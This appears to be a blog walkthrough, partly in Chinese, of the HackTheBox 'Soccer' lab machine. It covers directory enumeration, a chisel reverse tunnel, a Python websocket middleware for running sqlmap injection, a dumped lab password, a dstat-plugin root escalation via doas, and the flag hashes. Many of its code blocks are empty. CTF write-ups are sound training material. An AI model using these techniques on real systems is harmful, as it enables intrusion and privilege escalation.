HTB-Soccer
Soccer
NMAP enumeration
1 |
|
Recon
80/tcp
1 |
|
1 |
|
- dirsearch
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23Target: http://soccer.htb/
[02:06:16] Starting:
[02:06:23] 403 - 564B - /.ht_wsr.txt
[02:06:23] 403 - 564B - /.htaccess.bak1
[02:06:23] 403 - 564B - /.htaccess.save
[02:06:23] 403 - 564B - /.htaccess.sample
[02:06:23] 403 - 564B - /.htaccess.orig
[02:06:23] 403 - 564B - /.htaccessOLD2
[02:06:23] 403 - 564B - /.htaccessBAK
[02:06:23] 403 - 564B - /.htaccessOLD
[02:06:23] 403 - 564B - /.htaccess_extra
[02:06:23] 403 - 564B - /.htaccess_sc
[02:06:23] 403 - 564B - /.htaccess_orig
[02:06:23] 403 - 564B - /.html
[02:06:23] 403 - 564B - /.htm
[02:06:23] 403 - 564B - /.htpasswd_test
[02:06:23] 403 - 564B - /.htpasswds
[02:06:23] 403 - 564B - /.httr-oauth
[02:06:45] 403 - 564B - /admin/.htaccess
[02:06:55] 403 - 564B - /administrator/.htaccess
[02:06:59] 403 - 564B - /app/.htaccess
[02:07:24] 200 - 7KB - /index.html
1 |
|
- 訪問 /tiny/
EntryPoint
1 |
|
1 |
|
1 |
|
Get Shell
1 |
|
提權
netstat -antp
1
2
3
4
5
6
7
8
9
10
11
12
13tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1093/nginx: worker
tcp 0 15 10.10.11.194:47840 10.10.14.8:443 ESTABLISHED 2311/sh
tcp 0 0 127.0.0.1:3306 127.0.0.1:41290 ESTABLISHED -
tcp 0 0 127.0.0.1:41290 127.0.0.1:3306 ESTABLISHED -
tcp 0 0 10.10.11.194:9091 10.10.14.8:42182 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 1093/nginx: worker試著訪問端口3000
1
2
3
4
5#kali
./chisel_1.7.7_linux_amd64 server -p 8000 -reverse
#Victim
./chisel_1.7.7_linux_amd64 client 10.10.14.8:8000 R:socks
1 |
|
1 |
|
1 |
|
1 |
|
1 |
|
ws_sqli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
ws_server = "ws://soc-player.soccer.htb:9091/ws"
def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
# For our case, format the payload in JSON
message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
data = '{"id":"%s"}' % message
ws.send(data)
resp = ws.recv()
ws.close()
if resp:
return resp
else:
return ''
def middleware_server(host_port,content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=',1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = 'No parameters specified!'
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
return
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")
try:
middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
pass執行後可訪問localhost:8081?id=*
sqlmap
1 |
|
- dump出密碼
1
player / PlayerOftheMatch2022
ssh登入
1 |
|
SUID enumeration
1 |
|
1 |
|
doas指令提權
1 |
|
1 |
|
- dstat搭配doas
1
2查看dstat的man page
發現可以執行外部腳本插件
1 |
|
dstat_priv.py
1
2
3import subprocess
subprocess.run(["bash"])利用doas執行dstat並附上插件
1
doas /usr/bin/dstat --priv
FLAG
user
1
35907f92e87694451271ef44e476bcb8
root
1
8a8620bfc3502b614ccb3aa46ff7de90
HTB-Soccer
https://luoming1995125.github.io/2023/01/21/HTB-Soccer/